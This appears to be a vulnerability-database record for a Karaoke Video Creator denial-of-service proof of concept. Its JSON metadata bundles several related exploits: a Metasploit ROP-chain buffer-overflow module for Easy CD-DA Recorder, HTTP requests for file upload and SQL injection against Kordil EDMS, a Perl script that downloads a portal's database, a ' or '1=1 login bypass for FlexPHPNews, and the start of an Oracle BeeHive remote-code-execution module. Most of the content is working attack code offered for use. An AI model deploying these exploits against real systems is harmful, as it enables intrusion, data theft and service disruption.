ID 1337DAY-ID-13763 Type zdt Reporter PASSEWORD Modified 2010-08-20T00:00:00
Description
Exploit for windows platform in category dos / poc
=======================================
Karaoke Video Creator Denial of Service
=======================================
# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability
# Author: PASSEWORD
# Date: 2010-08-20
# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php
# Version : 2.2.8
# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers
# Tested on: Windows XP SP3 Fr
$buff="A" x 10000;
open (myfile , ">>PASS.PK2");
print myfile $buff;
close (myfile);
# 0day.today [2018-01-05] #
{"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [{"differentElements": ["sourceHref", "sourceData", "href"], "edition": 1, "lastseen": "2016-04-19T03:31:28", "bulletin": {"published": "2010-08-20T00:00:00", "id": "1337DAY-ID-13763", "cvss": {"score": 0.0, "vector": "NONE"}, "history": [], "enchantments": {"score": {"value": 7.6, "modified": "2016-04-19T03:31:28"}}, "hash": "70853e0b5285a33ad73d4155b75a67ebf96b6016e01780e3b356015393858a0c", "description": "Exploit for windows platform in category dos / poc", "type": "zdt", "lastseen": "2016-04-19T03:31:28", "edition": 1, "title": "Karaoke Video Creator Denial of Service", "href": "http://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 0, "cvelist": [], "sourceHref": "http://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2016-04-19] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "e6cd35bea631ebac8305f4a6985b28b2", "key": "sourceHref"}, {"hash": "7b15c3af60d44c5118dd1c7eb4179a1f", "key": "sourceData"}, {"hash": "058e04dde4ada0593b014d9fd2376fc0", "key": "href"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}], "objectVersion": "1.0"}}], "description": "Exploit for windows platform in category dos / poc", "hash": "4f0596794256b2c340ffd2810ffa81b7a38a5bfa8dd75608a46114514356bf50", "enchantments": {"score": {"value": 5.5, "vector": "NONE", "modified": "2018-01-05T21:16:30"}, "dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-31643", "1337DAY-ID-21889", "1337DAY-ID-13761", "1337DAY-ID-13760", "1337DAY-ID-4436"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:125195"]}, {"type": "exploitdb", "idList": ["EDB-ID:31643", "EDB-ID:13761", "EDB-ID:13763", "EDB-ID:13760"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/FILEFORMAT/EASYCDDA_PLS_BOF"]}, {"type": "cve", "idList": ["CVE-2010-2343"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6455", "SECURITYVULNS:DOC:13763"]}], "modified": "2018-01-05T21:16:30"}, "vulnersScore": 5.5}, "type": "zdt", "lastseen": "2018-01-05T21:16:30", "edition": 2, "title": "Karaoke Video Creator Denial of Service", "href": "https://0day.today/exploit/description/13763", "modified": "2010-08-20T00:00:00", "bulletinFamily": "exploit", "viewCount": 2, "cvelist": [], "sourceHref": "https://0day.today/exploit/13763", "references": [], "reporter": "PASSEWORD", "sourceData": "=======================================\r\nKaraoke Video Creator Denial of Service\r\n=======================================\r\n\r\n# Exploit Title: Karaoke Video Creator Denial of Service Vulnerability\r\n# Author: PASSEWORD\r\n# Date: 2010-08-20\r\n# Software Link: http://www.powerkaraoke.com/src/prod-karaoke-video-creator.php\r\n# Version : 2.2.8\r\n# Greetz 2 : d4rk-h4ck3r , And All Muslims And Tunisian Hackers\r\n# Tested on: Windows XP SP3 Fr\r\n \r\n$buff=\"A\" x 10000;\r\nopen (myfile , \">>PASS.PK2\");\r\nprint myfile $buff;\r\nclose (myfile);\r\n\r\n\n\n# 0day.today [2018-01-05] #", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "b0d3d3a91f21189719037cf41ad6dbfa", "key": "description"}, {"hash": "4c10a308279666eece1d08b00f824a86", "key": "href"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "modified"}, {"hash": "866042459d7d6bef5c46a6e536f70ac1", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "d2a2cd0457b9f02e4a5cc3855908c0bd", "key": "reporter"}, {"hash": "d9c5aa94b36b40b02a0a04189bb14af0", "key": "sourceData"}, {"hash": "02c658aed57f40a41959761d93070678", "key": "sourceHref"}, {"hash": "cdd6a1c8624d2a3db2086a9c0d4855f0", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "objectVersion": "1.3"}
{"zdt": [{"lastseen": "2018-11-19T19:11:21", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2018-11-16T00:00:00", "published": "2018-11-16T00:00:00", "id": "1337DAY-ID-31643", "href": "https://0day.today/exploit/description/31643", "title": "Kordil EDMS 2.2.60rc3 - Arbitrary File Upload Vulnerability", "type": "zdt", "sourceData": "# Exploit Title: Kordil EDMS 2.2.60rc3 - Arbitrary File Upload\r\n# Exploit Author: Ihsan Sencan\r\n# Vendor Homepage: http://www.kordil.net/\r\n# Software Link: https://vorboss.dl.sourceforge.net/project/kordiledms/Kordil%20EDMS%20v2.2.60rc3/kordil_edms_installer.exe\r\n# Version: 2.2.60rc3\r\n# Category: Webapps\r\n# Tested on: WiN7_x64/KaLiLinuX_x64\r\n# CVE: N/A\r\n \r\n# POC: \r\n# Users...\r\n# 1) \r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\nPOST /[PATH]/routine_emails_to_all_users_add.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nContent-Type: multipart/form-data; boundary=\r\n---------------------------114917121519378418451544589507\r\nContent-Length: 973\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd1\"\r\nadmin\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd2\"\r\nEfe\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd3\"\r\n2018-11-13 15:04:48\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"upload_fd4\"; filename=\"phpinfo.php\"\r\nContent-Type: application/force-download\r\n<?php\r\nphpinfo();\r\n?>\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"add_fd5\"\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"act\"\r\nn\r\n-----------------------------114917121519378418451544589507\r\nContent-Disposition: form-data; name=\"QS_Submit\"\r\nAdd\r\n-----------------------------114917121519378418451544589507--\r\nHTTP/1.1 302 Found\r\nDate: Tue, 13 Nov 2018 12:15:22 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nLocation: ./routine_emails_to_all_users.php?\r\nContent-Length: 0\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nContent-Type: text/html\r\n \r\nGET /PATH/email_attachment/admin-13.php HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nReferer: http://localhost/[PATH]/routine_emails_to_all_users.php?\r\nCookie: PHPSESSID=187947eb3de6ad8f5541f2c8d8e94225\r\nConnection: keep-alive\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:15:30 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 2)\r\n# http://localhost/[PATH]/routine_emails_to_all_users_add.php\r\n# \r\n# http://localhost/[PATH]/email_attachment//[FILE]\r\n# \r\n<html>\r\n<body>\r\n<form name=\"qs_add_form\" method=\"post\" action=\"http://localhost/[PATH]/routine_emails_to_all_users_add.php\" enctype=\"multipart/form-data\">\r\n<input type=\"hidden\" name=\"add_fd1\" value=\"admin\">\r\n<input type=\"text\" name=\"add_fd2\" value=\"Efe\">\r\n<input type=\"hidden\" name=\"add_fd3\" value=\" 2018-11-13 15:04:48\">\r\n<input type=\"file\" name=\"upload_fd4\" id=\"File\">\r\n<input type=\"text\" name=\"add_fd5\" value=\"\" hidden=\"true\">\r\n<input type=\"hidden\" name=\"act\" value=\"n\">\r\n<input type=\"submit\" name=\"QS_Submit\" value=\"Add\">\r\n</form>\r\n</body>\r\n</html>\r\n \r\n# POC: \r\n# 3)\r\n# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/users_edit.php?currentrow_fd0=%2d%31%20%20%55%4e%49%4f%4e%20%41%4c%4c%20%53%45%4c%45%43%54%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2c%32%32%2c%32%33%2c%32%34%2c%32%35%2c%32%36%2c%32%37%2c%32%38%2c%32%39%2c%33%30%2c%33%31%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:21:09 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=100\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\n \r\n# POC: \r\n# 4)\r\n# http://localhost/[PATH]/users_edit.php?currentrow_fd0=[SQL]\r\n#\r\nGET /PATH/personal_notebook_category_edit.php?currentrow_fd0=%2d%31%30%20%75%6e%69%6f%6e%20%73%65%6c%65%63%74%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%32%2c%33%2d%2d%20%2d HTTP/1.1\r\nHost: TARGET\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nCookie: PHPSESSID=d015a96da04d6dae8233a68bb35fb5d9\r\nDNT: 1\r\nConnection: keep-alive\r\nUpgrade-Insecure-Requests: 1\r\nHTTP/1.1 200 OK\r\nDate: Tue, 13 Nov 2018 12:22:49 GMT\r\nServer: Apache/2.2.11 (Win32) DAV/2 mod_ssl/2.2.11 OpenSSL/0.9.8i PHP/5.2.9\r\nX-Powered-By: PHP/5.2.9\r\nExpires: Thu, 19 Nov 1981 08:52:00 GMT\r\nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0\r\nPragma: no-cache\r\nKeep-Alive: timeout=5, max=97\r\nConnection: Keep-Alive\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\n\n# 0day.today [2018-11-19] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/31643"}, {"lastseen": "2018-02-10T11:36:43", "bulletinFamily": "exploit", "description": "Exploit for windows platform in category local exploits", "modified": "2014-02-13T00:00:00", "published": "2014-02-13T00:00:00", "id": "1337DAY-ID-21889", "href": "https://0day.today/exploit/description/21889", "type": "zdt", "title": "Easy CD-DA Recorder PLS Buffer Overflow Exploit", "sourceData": "require 'msf/core'\r\n \r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = NormalRanking\r\n \r\n include Msf::Exploit::FILEFORMAT\r\n \r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Easy CD-DA Recorder PLS Buffer Overflow',\r\n 'Description' => %q{\r\n This module exploits a stack-based buffer overflow vulnerability in\r\n Easy CD-DA Recorder 2007, caused by a long string in a playlist entry.\r\n By persuading the victim to open a specially-crafted .PLS file, a\r\n remote attacker could execute arbitrary code on the system or cause\r\n the application to crash. This module has been tested successfully on\r\n Windows XP SP3 and Windows 7 SP1.\r\n },\r\n 'License' => MSF_LICENSE,\r\n 'Author' =>\r\n [\r\n 'chap0', # Vulnerability discovery and original exploit\r\n 'Gabor Seljan', # Metasploit module\r\n 'juan vazquez' # Improved reliability\r\n ],\r\n 'References' =>\r\n [\r\n [ 'BID', '40631' ],\r\n [ 'EDB', '13761' ],\r\n [ 'OSVDB', '65256' ],\r\n [ 'CVE', '2010-2343' ],\r\n [ 'URL', 'http://www.corelan.be:8800/advisories.php?id=CORELAN-10-048' ]\r\n ],\r\n 'DefaultOptions' =>\r\n {\r\n 'ExitFunction' => 'process'\r\n },\r\n 'Platform' => 'win',\r\n 'Payload' =>\r\n {\r\n 'DisableNops' => true,\r\n 'BadChars' => \"\\x0a\\x3d\",\r\n 'Space' => 2454,\r\n 'PrependEncoder' => \"\\x81\\xc4\\x54\\xf2\\xff\\xff\" # ADD ESP,-3500\r\n },\r\n 'Targets' =>\r\n [\r\n [ 'Windows XP SP3 / Windows 7 SP1 (DEP Bypass)',\r\n # easycdda.exe 3.0.114.0\r\n # audconv.dll 7.0.815.0\r\n {\r\n 'Offset' => 1108,\r\n 'Ret' => 0x1001b19b # ADD ESP,0C10 # RETN 0x04 [audconv.dll]\r\n }\r\n ]\r\n ],\r\n 'Privileged' => false,\r\n 'DisclosureDate' => 'Jun 7 2010',\r\n 'DefaultTarget' => 0))\r\n \r\n register_options(\r\n [\r\n OptString.new('FILENAME', [ false, 'The file name.', 'msf.pls'])\r\n ],\r\n self.class)\r\n \r\n end\r\n \r\n def nops\r\n return make_nops(4).unpack(\"V\").first\r\n end\r\n \r\n def rop_nops(n = 1)\r\n # RETN (ROP NOP) [audconv.dll]\r\n [0x1003d55d].pack('V') * n\r\n end\r\n \r\n def exploit\r\n \r\n # ROP chain generated by mona.py - See corelan.be\r\n rop_gadgets =\r\n [\r\n 0x1007261e, # POP EDX # RETN [audconv.dll]\r\n 0x0042a0e0, # &VirtualProtect() [IAT easycdda.exe]\r\n 0x1003bd6b, # MOV EAX,DWORD PTR DS:[EDX] # RETN [audconv.dll]\r\n 0x10035802, # XCHG EAX,ESI # RETN [audconv.dll]\r\n 0x1005d288, # POP EBP # RETN [audconv.dll]\r\n 0x004030c8, # &PUSH ESP # RET 0x08 [easycdda.exe]\r\n 0x1005cc2d, # POP EBX # RETN [audconv.dll]\r\n 0x00000996, # 0x00000996-> EBX\r\n 0x1008740c, # POP EDX # RETN [audconv.dll]\r\n 0x00000040, # 0x00000040-> EDX\r\n 0x1001826d, # POP ECX # RETN [audconv.dll]\r\n 0x004364c6, # &Writable location [easycdda.exe]\r\n 0x00404aa9, # POP EDI # RETN [easycdda.exe]\r\n 0x100378e6, # RETN (ROP NOP) [audconv.dll]\r\n 0x0042527d, # POP EAX # RETN [easycdda.exe]\r\n nops,\r\n 0x00429692 # PUSHAD # INC EBX # ADD CL,CH # RETN [easycdda.exe]\r\n ].flatten.pack('V*')\r\n \r\n sploit = rop_nops(target['Offset'] / 4)\r\n sploit << [0x1003d55c].pack(\"V\") # pop edi # ret [audconv.dll]\r\n sploit << [target.ret].pack(\"V\")\r\n sploit << rop_nops(22)\r\n sploit << rop_gadgets\r\n sploit << payload.encoded\r\n sploit << rand_text_alpha_upper(10000) # Generate exception\r\n \r\n # Create the file\r\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\r\n file_create(sploit)\r\n \r\n end\r\nend\n\n# 0day.today [2018-02-10] #", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://0day.today/exploit/21889"}, {"lastseen": "2018-02-06T07:06:20", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13761", "href": "https://0day.today/exploit/description/13761", "type": "zdt", "title": "Anasayfam Portal 2010 Remote Database Disclosure Exploit", "sourceData": "========================================================\r\nAnasayfam Portal 2010 Remote Database Disclosure Exploit\r\n========================================================\r\n\r\n#!/usr/bin/perl -w\r\n#\r\n# Anasayfam Portal 2010 / Database Disclosure Exploit\r\n#\r\n# Coded: BARCOD3\r\n# \r\n#\r\n#\r\n#\r\n# Thanks: DaiMon, KnocKout, NeT-Excellans all Logystics.\r\n#\r\n \r\n \r\n \r\nuse LWP::Simple;\r\nuse LWP::UserAgent;\r\n\r\nsystem('cls');\r\nsystem('title Anasayfam Portal 2010 Remote Database Disclosure Exploit');\r\nsystem('color 4');\r\n\r\n\r\nif(@ARGV < 2)\r\n{\r\nprint \"[-]Example Exp.\\n\\n\";\r\n&help; exit();\r\n}\r\nsub help()\r\n{\r\nprint \"[+] usage1 : perl $0 site.com /path/ \\n\";\r\nprint \"[+] usage2 : perl $0 localhost / \\n\";\r\n}\r\n\r\nprint \"\\n************************************************************************\\n\";\r\nprint \"\\* Anasayfam 2010 Remote Database Disclosure Exploit *\\n\";\r\nprint \"\\* auth0r : BARCOD3 *\\n\";\r\nprint \"\\* contact : ozk4nbozkurt[at]hotmail[dot]com *\\n\";\r\nprint \"\\* Special thx. DaiMon, KnocKout, NeT-Excellans all Logystics. *\\n\";\r\nprint \"\\*********************************************************************\\n\\n\\n\";\r\n\r\n($TargetIP, $path, $File,) = @ARGV;\r\n\r\n$File=\"db/anasayfam.mdb\";\r\nmy $url = \"http://\" . $TargetIP . $path . $File;\r\nprint \"\\n wait!!! \\n\\n\";\r\n\r\nmy $useragent = LWP::UserAgent->new();\r\nmy $request = $useragent->get($url,\":content_file\" => \"C:/anasayfam.mdb\");\r\n\r\nif ($request->is_success)\r\n{\r\nprint \"[+] $url Exploited!\\n\\n\";\r\nprint \"[+] Database saved to C:/anasayfam.mdb\\n\";\r\nexit();\r\n}\r\nelse\r\n{\r\nprint \"[!] Dur la dur sakin ol $url olmadi bu !\\n[!] \".$request->status_line.\"\\n\";\r\nexit();\r\n}\r\n\r\n\n\n# 0day.today [2018-02-06] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13761"}, {"lastseen": "2018-01-02T05:14:52", "bulletinFamily": "exploit", "description": "Exploit for php platform in category web applications", "modified": "2010-08-19T00:00:00", "published": "2010-08-19T00:00:00", "id": "1337DAY-ID-13760", "href": "https://0day.today/exploit/description/13760", "type": "zdt", "title": "clipbucket 2.0.8.366 By Pass Vulnerability", "sourceData": "==========================================\r\nclipbucket 2.0.8.366 By Pass Vulnerability\r\n==========================================\r\n\r\n\r\n1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0\r\n0 _ __ __ __ 1\r\n1 /' \\ __ /'__`\\ /\\ \\__ /'__`\\ 0\r\n0 /\\_, \\ ___ /\\_\\/\\_\\ \\ \\ ___\\ \\ ,_\\/\\ \\/\\ \\ _ ___ 1\r\n1 \\/_/\\ \\ /' _ `\\ \\/\\ \\/_/_\\_<_ /'___\\ \\ \\/\\ \\ \\ \\ \\/\\`'__\\ 0\r\n0 \\ \\ \\/\\ \\/\\ \\ \\ \\ \\/\\ \\ \\ \\/\\ \\__/\\ \\ \\_\\ \\ \\_\\ \\ \\ \\/ 1\r\n1 \\ \\_\\ \\_\\ \\_\\_\\ \\ \\ \\____/\\ \\____\\\\ \\__\\\\ \\____/\\ \\_\\ 0\r\n0 \\/_/\\/_/\\/_/\\ \\_\\ \\/___/ \\/____/ \\/__/ \\/___/ \\/_/ 1\r\n1 \\ \\____/ >> Exploit database separated by exploit 0\r\n0 \\/___/ type (local, remote, DoS, etc.) 1\r\n1 1\r\n0 [+] Site : Inj3ct0r.com 0\r\n1 [+] Support e-mail : submit[at]inj3ct0r.com 1\r\n0 0\r\n1 ####################################### 1\r\n0 I'm indoushka member from Inj3ct0r Team 1\r\n1 ####################################### 0\r\n0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1\r\n\r\n######################################################################## \r\n\r\n# Vendor: www.Clip-Bucket.com\r\n\r\n# Date: 2010-05-27 \r\n\r\n# Author : indoushka \r\n\r\n# Thanks to : Inj3ct0r.com,Exploit-DB.com,SecurityReason.com,Hack0wn.com ! \r\n\r\n# Contact : 00213771818860\r\n\r\n# Home : www.sec4ever.net\r\n\r\n# Bug : By Pass\r\n\r\n# Tested on : windows SP2 Francais V.(Pnx2 2.0) \r\n######################################################################## \r\n \r\n# Exploit By indoushka \r\n\r\n1 - http://127.0.0.1/clip/admin_area/styles/cbv2/layout/\r\n\r\n_permission.html\r\nadd_group.html\r\nadd_members.html\r\nadd_phrase.html\r\nads_add_placements.html\r\nads_manager.html\r\nedit_group.html\r\neditor_pick.html\r\nflagged_groups.html\r\nflagged_users.html\r\nflagged_videos.html\r\ngroup_category.html\r\ngroups_manager.html\r\nheader.html\r\nleft_menu.html\r\nlogin.html\r\nmass_uploader.html\r\nmembers.html\r\nmsg.html\r\nplugin_manager.html\r\nreports.html\r\ntemplate_editor.html\r\ntemplates.html\r\nunder_development.html\r\nuser_category.html\r\nuser_levels.html\r\nview_conversion_log.html\r\nbody.html\r\nfooter.html\r\nmanage_pages.html\r\nedit_announcemnent.html\r\ncomments.html\r\nmass_email.html\r\ncb_mod_check.html\r\ncb_conversion_queue.html\r\nmanage_players.html\r\nindex.html\r\nview_user.html\r\nglobal_header.html\r\nreindex_cb.html\r\nlanguage_settings.html\r\nmain.html\r\nemail_settings.html\r\nvideo_manager.html\r\ncategory.html\r\nupload_thumbs.html\r\nview_video.html\r\nedit_video.html\r\n\r\nDz-Ghost Team ===== Saoucha * Star08 * Cyber Sec * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ===========================\r\nspecial thanks to : r0073r (inj3ct0r.com) * L0rd CruSad3r * MaYur * MA1201 * KeDar * Sonic * gunslinger_ * SeeMe * RoadKiller \r\nSid3^effects * aKa HaRi * His0k4 * Hussin-X * Rafik * Yashar * SoldierOfAllah * RiskY.HaCK * Stake * r1z * D4NB4R * www.alkrsan.net \r\nMR.SoOoFe * ThE g0bL!N * AnGeL25dZ * ViRuS_Ra3cH * Sn!pEr.S!Te \r\n---------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\n\n# 0day.today [2018-01-02] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/13760"}, {"lastseen": "2018-03-28T07:14:53", "bulletinFamily": "exploit", "description": "Exploit for unknown platform in category web applications", "modified": "2008-12-14T00:00:00", "published": "2008-12-14T00:00:00", "id": "1337DAY-ID-4436", "href": "https://0day.today/exploit/description/4436", "type": "zdt", "title": "FlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability ", "sourceData": "=================================================================\r\nFlexPHPNews 0.0.6 & PRO (Auth Bypass) SQL Injection Vulnerability \r\n=================================================================\r\n\r\n\r\n[START]\r\n\r\n#########################################################################################\r\n[0x01] Informations:\r\n\r\nScript : FlexPHPNews PRO 0.0.6\r\nScript\t : FlexPHPNews 0.0.6\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=24219&jump_type=1 [0.0.6 Pro]\r\nDownload : http://www.hotscripts.com/jump.php?listing_id=22130&jump_type=1 [0.0.6]\r\nVulnerability : Sql Injection (Auth bypass)\r\nAuthor : Osirys\r\nNotes : Proud to be Italian\r\nGreets: : XaDoS, x0r, emgent, Jay\r\n\r\n#########################################################################################\r\n[0x02] Bug:[Sql Injection (Auth bypass)]\r\n######\r\n\r\nBugged file is: /[path]/admin/usercheck.php\r\n\r\n[CODE]\r\n\r\nif (!empty($logincheck)){\r\n$sql = \"select username,adminid from newsadmin where username='$checkuser' and password='$checkpass'\";\r\n$results = $db->select($sql);\r\n\r\n[/CODE]\r\n\r\n\r\n[!] EXPLOIT DETAILS:\r\n\r\n [1] Go to /[path]/admin/index.php\r\n [2] Put as username and password the following sql code: ' or '1=1\r\n [3] You are the admin now, bypass succesfull =)\r\n\r\n#########################################################################################\r\n\r\n[/END]\r\n\r\n\r\n\n# 0day.today [2018-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/4436"}], "metasploit": [{"lastseen": "2019-11-27T05:07:21", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method found in voice-servlet can be abused to write a malicious file onto the target machine, and gain remote arbitrary code execution under the context of SYSTEM.\n", "modified": "2017-07-24T13:26:21", "published": "2015-11-25T01:17:57", "id": "MSF:EXPLOIT/WINDOWS/HTTP/ORACLE_BEEHIVE_EVALUATION", "href": "", "type": "metasploit", "title": "Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::EXE\n include Msf::Exploit::FileDropper\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"Oracle BeeHive 2 voice-servlet processEvaluation() Vulnerability\",\n 'Description' => %q{\n This module exploits a vulnerability found in Oracle BeeHive. The processEvaluation method\n found in voice-servlet can be abused to write a malicious file onto the target machine, and\n gain remote arbitrary code execution under the context of SYSTEM.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n '1c239c43f521145fa8385d64a9c32243', # Found the vuln first\n 'mr_me <steventhomasseeley[at]gmail.com>', # https://twitter.com/ae0n_ (overlapped finding & PoC)\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2010-4417' ],\n [ 'ZDI', '11-020' ],\n [ 'URL', 'http://www.oracle.com/technetwork/topics/security/cpujan2011-194091.html' ]\n ],\n 'DefaultOptions' =>\n {\n 'RPORT' => 7777\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n ['Oracle Beehive 2', {}]\n ],\n 'Privileged' => true,\n 'DisclosureDate' => 'Jun 09 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, 